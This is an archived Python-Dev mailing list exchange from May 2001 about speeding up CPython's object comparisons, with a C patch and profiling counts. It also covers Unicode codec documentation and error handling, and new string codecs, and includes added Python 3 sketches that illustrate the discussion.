The one application where this may help is list_contains, in particular when searching a list of interned strings. > You got an 8% speedup for one type by tricking the switch stmt into > appearing 3 calls earlier. What if the implementation were smarter, > and did it for *all* relevant types even a call or two before that? Please have a look at the patch below.
Since I did a CVS update yesterday, I had to redo the baseline measurements:

0.790 0.780 0.770 0.780 0.780 0.790 0.780 0.790 0.790 0.790

The patch moves the case "equal types, supporting cmp" somewhat earlier, just after the attempt to do richcompare. Now I get

0.760 0.770 0.750 0.770 0.750 0.750 0.760 0.760 0.760 0.760

So while there is some saving, this is not as good as implementing richcompare. > I don't see any reason "in principle" that compares couldn't be much > faster, and via the usual gimmicks: bigger, smarter functions that > remember what they've already determined so don't need to figure it > out over and over again, and fast paths to favor common cases at the > expense of comparisons from Mars. I agree "in principle" :-) However, you cannot move the case "equal types, implementing tp_compare" before the case "one of them implements tp_richcompare" without changing the semantics. The change here is what you'd do when you have both richcmp and oldcomp; Python clearly mandates using richcmp. In case this is not obvious (it wasn't to me): UserList will complain about using the deprecated __cmp__, and dictionaries will iterate over their elements differently. Given that richcomp has to be tried first, this patch does the "common case" at the earliest possible time, and with no overhead, except for a PyErr_Occurred call. So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT TP_RICHCOMPARE (sorry for shouting). If you think the extra work for type implementors is not acceptable, we can offer a convenience function that everybody implementing tp_compare can put into tp_richcompare. For strings, I would still special-case tp_richcompare: when tracing calls to string_richcompare, I found that most calls with Py_EQ can be decided by checking that the string lengths are not equal. This is all "bigger, faster functions" put to work.
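For readers who want to follow the patch without reading C, here is a rough Python 3 model of what convert_3way_to_object() and the reordered do_richcmp() do. It is a sketch under stated assumptions, not CPython code: the string operator names, the rich/three_way callbacks and cmp3() are hypothetical stand-ins, and the coercion fallback is deliberately left out.

```python
import operator

# Hypothetical stand-ins for the C constants Py_LT ... Py_GE.
_OPS = {
    "Py_LT": operator.lt,
    "Py_LE": operator.le,
    "Py_EQ": operator.eq,
    "Py_NE": operator.ne,
    "Py_GT": operator.gt,
    "Py_GE": operator.ge,
}


def convert_3way_to_object(op, c):
    """Map a three-way result c (<0, 0, >0) to True/False for operator op,
    mirroring the switch on op in the patch's C helper."""
    return _OPS[op](c, 0)


def do_richcmp(v, w, op, rich=None, three_way=None):
    """Model of the proposed dispatch order (not CPython's real code).

    rich(v, w, op) may return NotImplemented; three_way(v, w) returns <0/0/>0.
    """
    if rich is not None:
        res = rich(v, w, op)
        if res is not NotImplemented:
            return res  # a rich comparison always wins when implemented
    if type(v) is type(w) and three_way is not None:
        # Same-type fast path: skip coercion, convert the 3-way result.
        return convert_3way_to_object(op, three_way(v, w))
    raise NotImplementedError("coercion fallback is not modelled here")


def cmp3(a, b):
    """Hypothetical three-way compare for ordinary Python values."""
    return (a > b) - (a < b)


print(do_richcmp(3, 5, "Py_LT", three_way=cmp3))  # True
print(do_richcmp(3, 5, "Py_LT", rich=lambda v, w, op: NotImplemented,
                 three_way=cmp3))                 # True
```

The point of the ordering is that the rich slot keeps priority, and the same-type three-way path runs before any coercion is attempted.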
Regards, Martin

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -u -r2.131 object.c
--- object.c 2001/05/11 03:36:45 2.131
+++ object.c 2001/05/15 06:16:53
@@ -477,16 +477,6 @@
 	if (PyInstance_Check(w))
 		return (*w->ob_type->tp_compare)(v, w);
 
-	/* If the types are equal, don't bother with coercions etc. */
-	if (v->ob_type == w->ob_type) {
-		if ((f = v->ob_type->tp_compare) == NULL)
-			return 2;
-		c = (*f)(v, w);
-		if (PyErr_Occurred())
-			return -2;
-		return c < 0 ? -1 : c > 0 ? 1 : 0;
-	}
-
 	/* Try coercion; if it fails, give up */
 	c = PyNumber_CoerceEx(&v, &w);
 	if (c < 0)
@@ -590,15 +580,21 @@
    -1 if v < w;
     0 if v == w;
     1 if v > w;
+   If the object implements a tp_compare function, it returns
+   whatever this function returns (whether with an exception or not).
 */
 static int
 do_cmp(PyObject *v, PyObject *w)
 {
 	int c;
+	cmpfunc f;
 
 	c = try_rich_to_3way_compare(v, w);
 	if (c < 2)
 		return c;
+	if (v->ob_type == w->ob_type
+	    && (f = v->ob_type->tp_compare) != NULL)
+		return (*f)(v, w);
 	c = try_3way_compare(v, w);
 	if (c < 2)
 		return c;
@@ -760,16 +756,9 @@
 }
 
 static PyObject *
-try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+convert_3way_to_object(int op, int c)
 {
-	int c;
 	PyObject *result;
-
-	c = try_3way_compare(v, w);
-	if (c >= 2)
-		c = default_3way_compare(v, w);
-	if (c <= -2)
-		return NULL;
 	switch (op) {
 	case Py_LT: c = c < 0; break;
 	case Py_LE: c = c <= 0; break;
@@ -782,16 +771,46 @@
 	Py_INCREF(result);
 	return result;
 }
+
 
 static PyObject *
+try_3way_to_rich_compare(PyObject *v, PyObject *w, int op)
+{
+	int c;
+
+	c = try_3way_compare(v, w);
+	if (c >= 2)
+		c = default_3way_compare(v, w);
+	if (c <= -2)
+		return NULL;
+	return convert_3way_to_object(op, c);
+}
+
+static PyObject *
 do_richcmp(PyObject *v, PyObject *w, int op)
 {
 	PyObject *res;
+	cmpfunc f;
+
 
 	res = try_rich_compare(v, w, op);
 	if (res != Py_NotImplemented)
 		return res;
 	Py_DECREF(res);
+
+	/* If the types are equal, don't bother with coercions etc.
+	   Instances are special-cased in try_3way_compare, since
+	   a result of 2 does *not* mean one value being greater
+	   than the other. */
+	if (v->ob_type == w->ob_type
+	    && !PyInstance_Check(v)
+	    && (f = v->ob_type->tp_compare) != NULL) {
+		int c;
+		c = (*f)(v, w);
+		if (PyErr_Occurred())
+			return NULL;
+		return convert_3way_to_object(op, c);
+	}
 
 	return try_3way_to_rich_compare(v, w, op);
 }

From tim.one at home.com Tue May 15 09:33:06 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 03:33:06 -0400 Subject: [Python-Dev] Unicode docs In-Reply-To: <3AFFA23F.248517E3@lemburg.com> Message-ID: I don't know that the Unicode docs need massive work, but the docs that are there simply don't answer the technical questions people have: they're too thin. Let's keep it simple. Contrast the Library manual's: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. Error handling is done according to errors. The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. See also the codecs module. with Andrew's description (from http://www.amk.ca/python/2.0/): unicode(string [, encoding] [, errors]) Creates a Unicode string from an 8-bit string. encoding is a string naming the encoding to use. The errors parameter specifies the treatment of characters that are invalid for the current encoding; passing 'strict' as the value causes an exception to be raised on any encoding error, while 'ignore' causes errors to be silently ignored and 'replace' uses U+FFFD, the official replacement character, in case of any problems. The latter addresses several *fundamental* questions untouched by the former, like what are the datatypes of the arguments and the result, what values does errors accept, and what do they mean? The first blurb answers some more, like what's the default encoding, and which exception is raised?
Neither is complete on its own, but the reference manual should have a complete answer to all such questions. It doesn't have to go on at great length. A round-trip example would be invaluable. If Fred wanted to incorporate a brief overview too, a light rework of Andrew/Moshe's writeup would be an excellent start. From tim.one at home.com Tue May 15 09:47:16 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 03:47:16 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com> Message-ID: [M.-A. Lemburg] > The problem is: which part would raise the exception -- the > encoder or the decoder ? Since I don't yet use any of this stuff for real, I have no idea: seems mostly a question of pragmatics, and I don't have any feel for how cp875 users would view it. > Here are some more options: > > * sort the items before creating the encoding table from the > decoding one (makes the mapping stable) If users don't care that round-trip can fail silently, fine. > * map keys which have multiple mappings in the encoding table > to None -- this causes their usage to raise an exception > (undefined mapping) If users don't care that they'll get an exception when they try something that can't be round-tripped, fine. Or would this depend on the value of the "errors" argument too? Then it's easier to impose. There's a theme here : I have no idea how important roundtrip is in Unicode Practice, or even that it's a constant across apps and encodings. If I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I wouldn't care that I can't get "love" back from u"kaka" . From mal at lemburg.com Tue May 15 10:19:06 2001 From: mal at lemburg.com (M.-A. 
Lemburg) Date: Tue, 15 May 2001 10:19:06 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3B00E67A.C5769082@lemburg.com> Tim Peters wrote: > > I don't know that the Unicode docs need massive work, but the docs that are > there simply don't answer the technical questions people have: they're too > thin. As much as I would like to work on this, I simply don't have the time... if someone wants to contribute more detailed docs, though, I'd be glad to review them and answer remaining questions. Note that I will give a talk at the upcoming Bordeaux conference about Python and Unicode. The slides will eventually go online after the conference (in July). BTW, are any python-devs attending the conference (they have some great wine in that part of France ;-) ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Tue May 15 10:32:14 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:32:14 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B00E98E.1C44FF5@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > The problem is: which part would raise the exception -- the > > encoder or the decoder ? > > Since I don't yet use any of this stuff for real, I have no idea: seems > mostly a question of pragmatics, and I don't have any feel for how cp875 > users would view it. If there are any... that code page dates back to 1996 and is based in the EBCDIC world. > > Here are some more options: > > > > * sort the items before creating the encoding table from the > > decoding one (makes the mapping stable) > > If users don't care that round-trip can fail silently, fine. 
> > > * map keys which have multiple mappings in the encoding table > > to None -- this causes their usage to raise an exception > > (undefined mapping) > > If users don't care that they'll get an exception when they try something > that can't be round-tripped, fine. Or would this depend on the value of the > "errors" argument too? Then it's easier to impose. The errors argument tells the codecs what to do in case a mapping fails (from codecs.py): The .encode()/.decode() methods may implement different error handling schemes by providing the errors argument. These string values are defined: 'strict' - raise a ValueError error (or a subclass) 'ignore' - ignore the character and continue with the next 'replace' - replace with a suitable replacement character; Python will use the official U+FFFD REPLACEMENT CHARACTER for the builtin Unicode codecs. 'strict' is the default for all operations that deal with auto- conversion. 'ignore' and 'replace' allow silently ignoring the problem. > There's a theme here : I have no idea how important roundtrip is in > Unicode Practice, or even that it's a constant across apps and encodings. If > I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I > wouldn't care that I can't get "love" back from u"kaka" . Round-tripping is obviously very important if you use Unicode as basis for working on text. I don't know about the reasoning behind making cp875 fail the round-trip -- Unicode certainly provides means to make mappings round-trip safe (e.g. by reverting to the private Unicode char. point areas). 
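MAL's description of the errors argument can be tried out with the codecs that ship with present-day Python 3. A minimal sketch (encode_ascii and decode_ascii are illustrative helpers, not part of any API) that also gives the round-trip example Tim asked for: Latin-1 round-trips exactly, while ASCII exercises 'strict', 'ignore' and 'replace'. Note that in Python 3, 'replace' produces '?' when encoding and U+FFFD only when decoding.

```python
# "abc" followed by U+00E4 and U+00F6 ("abcäö"), written with escapes.
TEXT = "abc\u00e4\u00f6"


def encode_ascii(s, errors):
    """Encode s as ASCII with the given errors scheme; return the exception
    object instead of raising so the three schemes can be compared."""
    try:
        return s.encode("ascii", errors)
    except UnicodeEncodeError as exc:  # a ValueError subclass
        return exc


def decode_ascii(data, errors):
    """Same idea for decoding bytes that are not valid ASCII."""
    try:
        return data.decode("ascii", errors)
    except UnicodeDecodeError as exc:
        return exc


# Latin-1 can represent both characters, so the round trip is exact.
raw = TEXT.encode("latin-1")
print(raw, raw.decode("latin-1") == TEXT)  # b'abc\xe4\xf6' True

for scheme in ("strict", "ignore", "replace"):
    print(scheme, repr(encode_ascii(TEXT, scheme)), repr(decode_ascii(raw, scheme)))
```

Returning the exception object rather than letting it propagate keeps the comparison of the three schemes in one loop.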
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Tue May 15 11:26:32 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 05:26:32 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > Is this really exactly what Python would guarantee? I'm surprised that > x==x would always be true, but x!=x might be true also. In a type where > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > I had expected that you'd reduced it to > > if (v == w && op == Py_EQ) /* then return Py_True */ > if (v == w && op == Py_NE) /* then return Py_False */ I agree that would be more analogous to what PyObject_Compare() does. I'm not sure either make sense for rich comparisons; for example, under IEEE-754 rules, a NaN must compare not-equal to everything, including itself(!), and richcmps are the only hope Python users have of modeling that. Doing those pointer checks before giving richcmps a chance would kill that hope. Can we agree to drop this one until somebody produces stats saying it's important? I have no reason to suspect that it is. > The one application where this may help is list_contains, in > particular when searching a list of interned strings. string_compare() could special-case pointer equality too, although I suspect doing so would be a net loss. > Please have a look at the patch below. I will, but not tonight anymore -- it's been a very long day. > ... > I agree "in principle" :-) However, you cannot move the case "equal > types, implementing tp_compare" before the case "one of them > implements tp_richcompare" without changing the semantics. Of course. But except for instance objects, answering "does the type implement tp_richcompare?" 
is one lousy pointer check, and the answer will usually be-- provided we don't start stuffing code into *every* object's tp_richcompare slot! --"no, so I can go to tp_compare immediately". Coercions and richcmps are the oddball cases today. > The change here is what you'd do when you have both richcmp and > oldcomp; Python clearly mandates using richcmp. Yes, except you don't usually have both today and reality is exploitable . > In case this is not obvious (it wasn't to me): UserList will complain > about using the deprecated __cmp__, Sounds like a bug to me; if cmp is deprecated, that's also news to me. > and dictionaries will iterate over their elements differently. dicts didn't have a tp_richcompare slot before I added it last week, and because dicts can do a much faster and more-general job on Py_EQ and Py_NE than dict cmp (but on nothing else). I originally took away the tp_compare slot for dicts and lived to regret it -- it has both now. > Given that richcomp has to be tried first, this patch does the "common > case" at the earliest possible time, and with no overhead, except for > PyErr_Occurred call. The earliest *reasonable* time would be after a short block of new pointer checks while still inside PyObject_RichCompare(): I believe the usual case today is that the objects are of the same type, the type doesn't have a tp_richcompare slot, but does have a tp_compare slot. This covers at least ints, floats, longs and strings, where the overhead of a single function call is most often larger than the time it actually takes to compare the darned things. It's not important to, e.g., get to a dict comparison quickly, because comparing dicts is darned expensive even after we find the dict comparison routine. Ditto comparing instances or matrices etc. Optimizing for richcmps is optimizing the less important thing. BTW, tuples have a richcompare slot today and it's unclear that's a good idea. 
They do the same kind of Py_EQ/Py_NE "length check" you like for strings, and I'd be surprised if that didn't cost more than it saves. Unlike strings, whenever I compare tuples they *always* have the same size (e.g., think of all the decorator pattern ways tuples are used to augment sorts). OK, across a full run of the test suite, tuplerichcompare() was called about 162000 times, all but about 50 times with Py_EQ or Py_NE. The number of times this code block at the start bore fruit:

    if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) {
        /* Shortcut: if the lengths differ, the tuples differ */
        PyObject *res;
        if (op == Py_EQ)
            res = Py_False;
        else
            res = Py_True;
        Py_INCREF(res);
        return res;
    }

was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code just burned cycles. I want to move toward optimizations that save more than they cost <0.7 wink>. > ... > For strings, I would still special-case tp_richcompare: when tracing > calls to string_richcompare, I found that most calls with Py_EQ can > be decided by checking that the string lengths are not equal. I expect you'd also find that the current string_compare() usually decides they're not equal on the first character comparison (which *it* special-cases). So special-casing on length isn't a clear win over what's already done. But, if it is, bravo! Special-case the snot out of it without calling *any* string functions (merely calling string_richcompare likely costs a good deal more than comparing the lengths).
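Tim's measurement is easy to mimic in a few lines. This is a hypothetical Python 3 sketch, not tupleobject.c: tuple_eq() models a length check placed in front of the element-wise comparison, and the word list is made up. It only illustrates why tuples produced by the decorate-sort-undecorate idiom never trigger the shortcut: they all have the same length.

```python
from itertools import combinations


def tuple_eq(a, b, stats):
    """Hypothetical instrumented tuple equality with a length shortcut."""
    stats["calls"] += 1
    if len(a) != len(b):  # the shortcut whose payoff Tim measured
        stats["length_decided"] += 1
        return False
    return all(x == y for x, y in zip(a, b))


# Decorate: pair each word with its sort key, so every tuple has length 2.
words = ["pear", "fig", "apple", "kiwi", "plum"]
decorated = [(len(w), w) for w in words]

stats = {"calls": 0, "length_decided": 0}
for a, b in combinations(decorated, 2):
    tuple_eq(a, b, stats)
print(stats)  # {'calls': 10, 'length_decided': 0}

# Sort and undecorate, as in the decorate-sort-undecorate idiom.
decorated.sort()
print([w for _, w in decorated])  # ['fig', 'kiwi', 'pear', 'plum', 'apple']
```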
more-measuring-less-guessing-ly y'rs - tim From thomas at xs4all.net Tue May 15 13:51:06 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 15 May 2001 13:51:06 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600 References: <200105150426.f4F4QVx01531@localhost.local> Message-ID: <20010515135106.A16811@xs4all.nl> On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote: > I thought I was th only one getting all these silly Nigerian scam spams. I > figured maybe they saw my name and decided to test on me (though they might > more cleverly have figured that a fellow Nigerian would be wise to the game). Actually, one of my colleagues informed me that this spam is in fact *very old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the Nigerian spam a mere week after getting the spam myself :) Scott (my colleague, not Adams) remembers first getting it by fax, 15 years ago, and again several years later. And not just one fax, but every single fax in the company, and lots more outside of the company. Apparently the telephone operator issued a warning to all customers not to respond to the fax. Still-sound-advice-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Tue May 15 14:10:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 14:10:16 +0200 Subject: [Python-Dev] Easy codec access Message-ID: <3B011CA8.9DDB4FC7@lemburg.com> I've just checked in a set of patches which implement the new .decode() method along with a couple of useful codecs. 
You can now do things like these:

>>> "abc".encode('zlib').encode('base64')
'eJxLTEoGAAJNASc=\n'
>>> _.decode('base64').decode('zlib')
'abc'
>>> "abcäöü".decode('latin-1')
u'abc\xe4\xf6\xfc'
>>> "abcäöü".decode('latin-1').encode('latin-1')
'abc\xe4\xf6\xfc'
>>> "Hello World !".encode('rot13')
'Uryyb Jbeyq !'

So the overall codec experience should be a much better one now. To see just how easy it is to write codecs, please have a look at the string codecs I added in this patch (e.g. zlib_codec.py or hex_codec.py). I am pretty sure that there are a lot more useful things in the standard lib which could benefit from these easy-to-use interfaces. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Tue May 15 14:11:26 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Tue, 15 May 2001 14:11:26 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 References: <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl> Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff> thomas wrote: > Actually, one of my colleagues informed me that this spam is in fact > *very old* more info here: http://home.rica.net/alphae/419coal/index.htm "A Five Billion US$ (as of 1996, much more now) worldwide Scam which has run since the early 1980's under Successive Governments of Nigeria. "The Nigerian Scam is, according to published reports, the Third to Fifth largest industry in Nigeria." Cheers /F (highest offer so far: $155,000,000) From guido at digicool.com Tue May 15 17:27:31 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 10:27:31 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400."
References: Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> > [Martin v. Loewis] > > Is this really exactly what Python would guarantee? I'm surprised that > > x==x would always be true, but x!=x might be true also. In a type where > > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > > I had expected that you'd reduced it to > > > > if (v == w && op == Py_EQ) /* then return Py_True */ > > if (v == w && op == Py_NE) /* then return Py_False */ [Tim] > I agree that would be more analogous to what PyObject_Compare() does. > > I'm not sure either make sense for rich comparisons; for example, under > IEEE-754 rules, a NaN must compare not-equal to everything, including > itself(!), and richcmps are the only hope Python users have of modeling that. > Doing those pointer checks before giving richcmps a chance would kill that > hope. Can we agree to drop this one until somebody produces stats saying > it's important? I have no reason to suspect that it is. PEP 207 is quite explicit that == and != are not to be assumed each other's complement. It is silent on the x==x issue but the PEP mentions IEEE 754 so I agree that this also shouldn't be cut short. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake at acm.org Tue May 15 17:29:10 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 15 May 2001 11:29:10 -0400 (EDT) Subject: [Python-Dev] Unicode docs In-Reply-To: References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com> Tim Peters writes: > The latter addresses several *fundamental* questions untouched by > the former, like what are the datatypes of the arguments and the > result, what values does errors accept, and what do they mean? The > first blurb answers some more, like what's the default encoding, > and which exception is raised?
Neither is complete on its own, but > the reference manual should have a complete answer to all such > questions. It doesn't have to go on at great length. I've beefed up the description of the unicode() function by merging the information from AMK's document. > A round-trip example would be invaluable. > > If Fred wanted to incorporate a brief overview too, a light rework of > Andrew/Moshe's writeup would be an excellent start. I'd love to have a contribution from someone with more knowledge of what's there than me. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido at digicool.com Tue May 15 18:35:09 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 11:35:09 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200." <3B011CA8.9DDB4FC7@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com> > I've just checked in a set of patches which implement the new > .decode() method along with a couple of useful codecs. Cool! > To see just how easy it is to write codecs, please have > a look at the string codecs I added in this patch (e.g. > zlib_codec.py or hex_codec.py). I am pretty sure that there > are a lot more useful things in the standard lib which could > benefit from these easy-to-use interfaces. As an exercise, I added a quoted-printable codec. It was easy indeed! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Tue May 15 20:21:00 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Tue, 15 May 2001 20:21:00 +0200 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid> in case anyone has two hours to spare, and the right software, MIT's dynamic languages group has posted a quicktime video of their recent panel on language design.
http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html (what 1/2 should result in, why it's good to have both CPython and JPython, why whitespace is significant, why language design is perhaps more related to architecture than math, and lots of other goodies from Guy Steele and others) Cheers /F From nas at python.ca Tue May 15 20:51:20 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 15 May 2001 11:51:20 -0700 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200 References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> Message-ID: <20010515115120.A14357@glacier.fnational.com> Fredrik Lundh wrote: > in case anyone has two hours to spare, and the right software, > MIT's dynamic languages group has posted a quicktime video of > their recent panel on language design. > > http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html Does the streaming actually work for anyone? I've given up and started downloading the whole .mov files. Neil From martin at loewis.home.cs.tu-berlin.de Tue May 15 21:45:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 21:45:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> > more-measuring-less-guessing-ly y'rs - tim Producing numbers is easy :-) I've instrumented my version where string implements richcmp, and special-cases everything I can think of. Counting is done for running the test suite. With this, I get

Calls to string_richcompare: 2378660
Calls with different types: 33992 (ie. one is not a string)
Calls with identical strings: 120517
Calls where lens decide !EQ: 1775716
----------------------------
Calls richcmp -> oldcomp: 448435
Total calls to oldcomp: 1225643
Calls oldcomp -> memcmp: 860174

So 5% of the calls are with identical strings, for which I can immediately decide the outcome. 75% can be decided in terms of the string lengths, which leaves ca. 19% for cases where lexicographical comparison is needed. In those cases, the first byte decides in 30%. If I remove the test for "len decides !EQ", I get

#riches: 2358322
#riches_ni: 34108
#idents_decide: 102050
#lens_decide: 0
--------------------------------------
rest(computed): 2222164
#comps: 2949421
#memcmps: 917776

So still, ca. 30% can be decided by first byte. It still appears that the total number of calls to memcmp is higher when the length is not taken into consideration. To verify this claim, I've counted the cases where the length decides the outcome, and how many of those the first byte would also have decided:

lens_decide: 1784897
lens_decide_firstbyte_wouldhave: 1671148

So in 6% of the cases, checking the length alone gives a decision which looking at the first byte doesn't; plus it saves a function call. To support the thesis that Py_EQ is the common case for strings, I counted the various operations:

pyEQ: 2271593
pyLE: 9234
pyGE: 0
pyNE: 20470
pyLT: 22765
pyGT: 578

Now, that might be flawed since comparing strings for equality is extremely frequent in the testsuite. To give more credibility to the data, I also ran setup.py with my instrumented ./python:

riches: 21640
riches_ni: 76
riches_ni1: 0
idents: 2885
idents_decide: 2885
lens_decide: 9472
lens_decide_firstbyte_wouldhave: 6223
comps: 26360
memcmps: 19224
pyEQ: 20093
pyLE: 46
pyGE: 1
pyNE: 548
pyLT: 876
pyGT: 0

That shows that optimizing for Py_NE is not worth it. With these data, I'll upload a patch to SF.
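The order of checks behind Martin's counters can be modelled in Python to see which test settles each call. This is only a sketch: string_eq() and its counter names are hypothetical, and the real patch works on C string objects inside string_richcompare.

```python
from collections import Counter


def string_eq(a, b, stats):
    """Hypothetical model of the Py_EQ check order for two strings:
    identity, then length, then first character, then a full compare."""
    stats["calls"] += 1
    if a is b:
        stats["identity"] += 1
        return True
    if len(a) != len(b):
        stats["length"] += 1
        return False
    if a[:1] != b[:1]:
        stats["first_char"] += 1
        return False
    stats["full_compare"] += 1
    return a == b


stats = Counter()
s = "spam"
results = [
    string_eq(s, s, stats),             # same object: identity decides
    string_eq("spam", "eggs!", stats),  # different lengths
    string_eq("spam", "eggs", stats),   # same length, first character differs
    string_eq("spam", "spat", stats),   # needs the full comparison
]
print(results)  # [True, False, False, False]
print(dict(stats))
```

Each call is charged to exactly one deciding test, which is the same bookkeeping Martin's idents_decide, lens_decide and memcmps counters perform.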
Regards, Martin From tim at digicool.com Tue May 15 22:22:37 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 15 May 2001 16:22:37 -0400 Subject: [Python-Dev] Comparison corner case Message-ID: Here's an excerpt from the tail end of a patch comment. If you believe the illustrated behavior is wrong, then I don't believe we gain anything from using the tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain for the latter is that it allows EQ/NE tuple comparison to work correctly on tuples containing elements that support only EQ/NE comparisons):

"""
BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, because it won't believe there's any difference unless Py_EQ returns false for some corresponding elements:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> C() < C()
1
>>> (C(),) < (C(),)
0
>>>

That doesn't make sense -- provided you believe the defn. of C makes sense.
"""

From guido at digicool.com Tue May 15 23:36:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 16:36:57 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST." References: Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Tim wrote:

> BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ returns false
> for some corresponding elements:
>
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
>
> That doesn't make sense -- provided you believe the defn. of C makes sense.

I think in this example the problem is with C, not with the tuple algorithm. The question is, what are you going to do otherwise? You could test for < first, == second -- but that means twice as many comparisons, and for reasonably-behaved items it makes no difference at all.
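Guido's point that the sequence algorithm consults == before < can be made concrete with a small Python 3 model. lex_lt() is an illustrative name, not CPython's tuplerichcompare. The last two lines show what present-day CPython does with a NaN inside a tuple: an object is treated as equal to itself before __eq__ is tried, which is not necessarily what Python 2.1 did.

```python
class C:
    """Deliberately inconsistent: every instance claims to be both less than
    and equal to every other instance (the example from the thread)."""

    def __lt__(self, other):
        return 1

    __eq__ = __lt__


def lex_lt(a, b):
    """Model of sequence '<': find the first position where the items are
    not ==, compare only that pair with <, else fall back to the lengths.
    (CPython also treats an object as equal to itself without calling
    __eq__; this model skips that identity shortcut.)"""
    for x, y in zip(a, b):
        if not x == y:
            return x < y
    return len(a) < len(b)


print(C() < C())               # 1
print((C(),) < (C(),))         # False
print(lex_lt((C(),), (C(),)))  # False

nan = float("nan")
print(nan == nan)              # False
print((nan,) == (nan,))        # True: identity is checked before __eq__
```

Testing < first and == second, as Guido notes, would double the number of element comparisons for well-behaved items without changing their results.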
